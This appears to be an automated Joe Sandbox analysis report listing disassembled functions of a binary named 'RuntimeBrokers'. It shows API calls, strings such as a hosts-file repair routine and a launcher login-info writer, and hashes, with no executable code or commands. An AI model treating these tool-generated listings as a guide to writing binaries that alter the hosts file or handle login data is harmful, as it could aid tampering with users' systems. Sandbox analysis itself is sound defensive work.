                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memmove$strchr$memchrstrstr
                                        • String ID: ://$tcp
                                        • API String ID: 2271568606-1181326313
                                        • Opcode ID: 4f02d132d24163801154e940d13c95408e35d07f5caae35af0bdce70dabe7f50
                                        • Instruction ID: f3c7c65d2f96df4a229d3991269f7b96ba1b044e5fa28cc33291338a770895a3
                                        • Opcode Fuzzy Hash: 4f02d132d24163801154e940d13c95408e35d07f5caae35af0bdce70dabe7f50
                                        • Instruction Fuzzy Hash: 72518F73B043155FD320EEB8EC80B927798FB09798F050629DC5487742E366990DCBE6
                                        Function 6C0D2525 Relevance: 15.2, APIs: 10, Instructions: 152COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C0D252C
                                        • ?width@ios_base@std@@QBE_JXZ.MSVCP140(00000024), ref: 6C0D255A
                                        • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 6C0D2571
                                        • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 6C0D2589
                                        • ?flags@ios_base@std@@QBEHXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D25D4
                                        • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D2603
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D2644
                                        • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D2672
                                        • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D26AE
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D26E7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?width@ios_base@std@@$?sputc@?$basic_streambuf@_D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?flags@ios_base@std@@?setstate@?$basic_ios@?sputn@?$basic_streambuf@H_prolog3_catch
                                        • String ID:
                                        • API String ID: 2240115643-0
                                        • Opcode ID: 4ed0c4c889fa09f64d9842931e492b7029390611a881b3c1a35cf2d8f32b5df6
                                        • Instruction ID: 65f89b5e305caadb13adb485f15a058d30b64bcbcf6f51080a954052c217f9f8
                                        • Opcode Fuzzy Hash: 4ed0c4c889fa09f64d9842931e492b7029390611a881b3c1a35cf2d8f32b5df6
                                        • Instruction Fuzzy Hash: 98515A74A1124A8FCB14CF58C9A8AADBBF5FF49314F258159F516AB781CB30AD81CB90
                                        Function 6C143D44 Relevance: 15.1, APIs: 10, Instructions: 123threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C143D4B
                                        • closesocket.WS2_32(?), ref: 6C143D6F
                                        • std::_Cnd_initX.LIBCPMT ref: 6C143D9C
                                        • std::_Cnd_initX.LIBCPMT ref: 6C143DB6
                                        • std::_Cnd_initX.LIBCPMT ref: 6C143DC5
                                        • TerminateThread.KERNEL32(00000000,00000000,00000028,6C144491,00000050,6C145C47,00000054), ref: 6C143DF5
                                        • std::_Cnd_initX.LIBCPMT ref: 6C143E1A
                                        • std::_Cnd_initX.LIBCPMT ref: 6C143E29
                                        • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON(?,?), ref: 6C143EB7
                                        • std::_Cnd_initX.LIBCPMT ref: 6C143ED0
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Cnd_initstd::_$AsyncH_prolog3PushTask@common@ierd_tgp@@TerminateThreadV?$function@$$Z@std@@closesocket
                                        • String ID:
                                        • API String ID: 4181131528-0
                                        • Opcode ID: 3db180f2387e3c3a7b025bc85c60c3167e37f97c66aae11c10491c37ede71789
                                        • Instruction ID: e95324dd7ea1aca28dcb32b5aa978ea771fa537a1cc2bfed9da98698f1710db3
                                        • Opcode Fuzzy Hash: 3db180f2387e3c3a7b025bc85c60c3167e37f97c66aae11c10491c37ede71789
                                        • Instruction Fuzzy Hash: 89515A70D05609EECB04DBA4D984BCDBBF4BF09318F60825AD015A7A80DB74AB09CBA5
                                        Function 6C0D2BAA Relevance: 15.1, APIs: 10, Instructions: 123COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C0D2BB1
                                        • ?width@ios_base@std@@QBE_JXZ.MSVCP140(00000018,6C0D271C,?,?,?), ref: 6C0D2BC7
                                        • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 6C0D2BDE
                                        • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 6C0D2BF0
                                        • ?flags@ios_base@std@@QBEHXZ.MSVCP140(?,?,?), ref: 6C0D2C26
                                        • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP140(?,?,?,?), ref: 6C0D2C4C
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000,?,?,?), ref: 6C0D2C83
                                        • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP140(?,?,?,?), ref: 6C0D2CA8
                                        • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,?,?,?), ref: 6C0D2CDB
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000,?,?,?), ref: 6C0D2D14
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?width@ios_base@std@@$?sputc@?$basic_streambuf@_D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?flags@ios_base@std@@?setstate@?$basic_ios@?sputn@?$basic_streambuf@H_prolog3_catch
                                        • String ID:
                                        • API String ID: 2240115643-0
                                        • Opcode ID: fc828992e8a4f30dff44e3126898b280785b51ff512f4a3110a654ab4b1edb90
                                        • Instruction ID: 1f9407b5548f05fb394b8e419c8481d5ca7daf6fb0fbc13a4e6d61b2a269b883
                                        • Opcode Fuzzy Hash: fc828992e8a4f30dff44e3126898b280785b51ff512f4a3110a654ab4b1edb90
                                        • Instruction Fuzzy Hash: 8F411530A002458FCB20CF59C998AADBBF4FF49304F658459E58AEB691CB31EE40CB61
                                        Function 6C10E515 Relevance: 15.1, APIs: 10, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E519
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E536
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E542
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E555
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E561
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E56B
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E577
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E587
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E593
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C10E5A0
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?pptr@?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 2505503336-0
                                        • Opcode ID: cfa25bf7d28e254383d535132847d91da8b7c16f56d3ae46b2b70a2a0869fd71
                                        • Instruction ID: 5da062182f71c84a576d4d135d1dd313889d45e4a9f847b0bbe124e61f14d0a6
                                        • Opcode Fuzzy Hash: cfa25bf7d28e254383d535132847d91da8b7c16f56d3ae46b2b70a2a0869fd71
                                        • Instruction Fuzzy Hash: E511F638300551CBCB259F25C19813CBBB6BF8630A7190A59E94AC7B90EF74ED518FE2
                                        Function 6C0CFC79 Relevance: 15.1, APIs: 10, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CFC7D
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CFC97
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CFCA3
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CFCB6
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CFCC2
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CFCCC
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CFCD8
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CFCE8
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CFCF4
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CFD01
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?pptr@?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 2505503336-0
                                        • Opcode ID: 9cccce13b4d4e9e2e9c26b856c6df227b6eacaf786312b5ce4298555147bb2b2
                                        • Instruction ID: ca992697dc37f82db42a7009fb5fb18721b8b4625cbc1f3dbda74bebc9e39c8d
                                        • Opcode Fuzzy Hash: 9cccce13b4d4e9e2e9c26b856c6df227b6eacaf786312b5ce4298555147bb2b2
                                        • Instruction Fuzzy Hash: D7112B303155518B8B255F38919827CBBFFBF8A3617980158D80AC7F80CF34BC619B92
                                        Function 6C0AE0B0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(?,?,?,B33B76E5,?,0000E845,00000000), ref: 6C0AE102
                                          • Part of subcall function 6C0ABF60: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?,00000000,6C1D2CC5,?,%4095[^;=] =%4095[^;],?,?), ref: 6C0ABF7B
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0000E845,00000000), ref: 6C0AE19B
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,19999999,00000000,?,?,?,?,?,?,?,0000E845,00000000), ref: 6C0AE242
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,19999999,00000000,?,?,?,?,?,?,?,0000E845,00000000), ref: 6C0AE28A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,19999999,00000000,?,?,?,?,?,?,?,0000E845,00000000), ref: 6C0AE2D2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$__stdio_common_vsscanfmemmove
                                        • String ID: %lld$' is not a number.$-
                                        • API String ID: 4106403372-445355879
                                        • Opcode ID: 8d5cc58a60e3643763b2d0dfd37bea8ce48c00a9aa0c4d802d7287d8041087c9
                                        • Instruction ID: 3caef521fd69bd7a13bc720e3ad0c27a4de78392dd1d69a108f562b4d0c0b8b5
                                        • Opcode Fuzzy Hash: 8d5cc58a60e3643763b2d0dfd37bea8ce48c00a9aa0c4d802d7287d8041087c9
                                        • Instruction Fuzzy Hash: 04C1E771A152089FEB14CFE4C894B9EBBF5EF45308F24422DE425DBB82D734A846CB91
                                        Function 6C0D68AA Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 278COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0D68B1
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                          • Part of subcall function 6C0D4512: __EH_prolog3.LIBCMT ref: 6C0D4519
                                          • Part of subcall function 6C0D66C3: __EH_prolog3.LIBCMT ref: 6C0D66CA
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,?,?,?,00000050,6C0D45D9,?,?,?,00000000), ref: 6C0D6931
                                        • ?c_str@path@filesystem@ierd_tgp@@QBEPB_WXZ.COMMON(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0D6A2D
                                        • ~refcount_ptr.LIBCPMT ref: 6C0D6A40
                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0D6A45
                                          • Part of subcall function 6C0D438A: __EH_prolog3.LIBCMT ref: 6C0D4391
                                          • Part of subcall function 6C0D8DB3: __EH_prolog3.LIBCMT ref: 6C0D8DBA
                                        • OutputDebugStringW.KERNEL32(00000000,?,00000000,00000000), ref: 6C0D6B1F
                                        • OutputDebugStringW.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000000), ref: 6C0D6BB7
                                        Strings
                                        • forced abort due to illegal log prefix [{}], xrefs: 6C0D6A11
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$DebugOutputString$?c_str@path@filesystem@ierd_tgp@@CountCriticalH_prolog3_InitializeSectionSpinabortmemmove~refcount_ptr
                                        • String ID: forced abort due to illegal log prefix [{}]
                                        • API String ID: 816663753-1525200662
                                        • Opcode ID: 2b7d8b83ba1cfcbb00d1a33495c7346a0ddeae112555629145faf58a1348e435
                                        • Instruction ID: d9166c7425e4c3de73d896c577e2af10a8821b50f76d48f6a344fcada4cae78e
                                        • Opcode Fuzzy Hash: 2b7d8b83ba1cfcbb00d1a33495c7346a0ddeae112555629145faf58a1348e435
                                        • Instruction Fuzzy Hash: 10B1BD71905388EFDB05DBA8C944BDEBFF8AF15308F14449DE041A7B81DB75AA09CB62
                                        Function 0040C330 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165filesynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,00002710,F107BA66,?), ref: 0040C36E
                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040C39F
                                        • SetSecurityDescriptorDacl.ADVAPI32(00000001,00000001,00000000,00000001), ref: 0040C3B2
                                          • Part of subcall function 0040C8ED: _strlen.LIBCMT ref: 0040C953
                                        • CreateFileMappingW.KERNEL32(000000FF,0000000C,00000004,00000000,0000049B,?), ref: 0040C4B7
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0040C4E6
                                        • UnmapViewOfFile.KERNEL32(00000000,?,?,?), ref: 0040C50B
                                        • ReleaseMutex.KERNEL32(?), ref: 0040C51F
                                          • Part of subcall function 0040C845: WaitForSingleObject.KERNEL32(?,00002710,?,?,0040BB94,00000000), ref: 0040C857
                                          • Part of subcall function 0040C845: CloseHandle.KERNEL32(?,?,0040BB94,00000000), ref: 0040C860
                                          • Part of subcall function 0040C845: ReleaseMutex.KERNEL32(?,?,0040BB94,00000000), ref: 0040C86C
                                        Strings
                                        • DNFLauncher::WriteLoginInfo() shareMemoryName: %s, xrefs: 0040C467
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: File$DescriptorMutexObjectReleaseSecuritySingleViewWait$CloseCreateDaclHandleInitializeMappingUnmap_strlen
                                        • String ID: DNFLauncher::WriteLoginInfo() shareMemoryName: %s
                                        • API String ID: 3700979751-2473925066
                                        • Opcode ID: 3836d647659e2d2c5fc6b813f333275c9365f70d37b6c9e679510664f3bebd1d
                                        • Instruction ID: 2cf3379dc2136eefe2729679ff817c425ce6f467f31476c21cafcdebadb457aa
                                        • Opcode Fuzzy Hash: 3836d647659e2d2c5fc6b813f333275c9365f70d37b6c9e679510664f3bebd1d
                                        • Instruction Fuzzy Hash: DA715630904348EFEB01DBA8CD49BDDBBB4BF08308F1441A9E105AB2D2D7B85A49DB55
                                        Function 6C0FE0F9 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0FE103
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000005,00000080,00000000,00000114,6C0FEF74,?,?,\drivers\etc\hosts), ref: 6C0FE134
                                        • GetLastError.KERNEL32 ref: 6C0FE145
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0FE151
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0CF613: __EH_prolog3_GS.LIBCMT ref: 6C0CF648
                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,6C345CA8,00000002,00000000,00000018), ref: 6C0FE280
                                        • CloseHandle.KERNEL32(00000000,00000018), ref: 6C0FE2D9
                                        Strings
                                        • [repair_hosts]WriteFileLines open file error:%u, xrefs: 6C0FE198
                                        • d:\ci_dev\wegame_client\codes\common\src\dns_repair.cpp, xrefs: 6C0FE17D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: FileH_prolog3_$?get_log_instance@base@@CloseCreateErrorH_prolog3HandleLastLogger@1@Write
                                        • String ID: [repair_hosts]WriteFileLines open file error:%u$d:\ci_dev\wegame_client\codes\common\src\dns_repair.cpp
                                        • API String ID: 1019973358-2298770575
                                        • Opcode ID: 2aa849ce4f651302881da5736db2f579498ea6384a466c0f5908d542559ab7fd
                                        • Instruction ID: afdb3b279e57c57c2af27e6ebab644079375b9ae33c34ac81dbde14c2dd581c6
                                        • Opcode Fuzzy Hash: 2aa849ce4f651302881da5736db2f579498ea6384a466c0f5908d542559ab7fd
                                        • Instruction Fuzzy Hash: 28518D71A012189FDB18CBA4C855BEDB7F4AF05714F204198E625A76C0EB34AE89CFA1
                                        Function 6C0CED39 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0CED40
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000060,6C0CE5A3,?,00000000,6C0CE541,?), ref: 6C0CED54
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
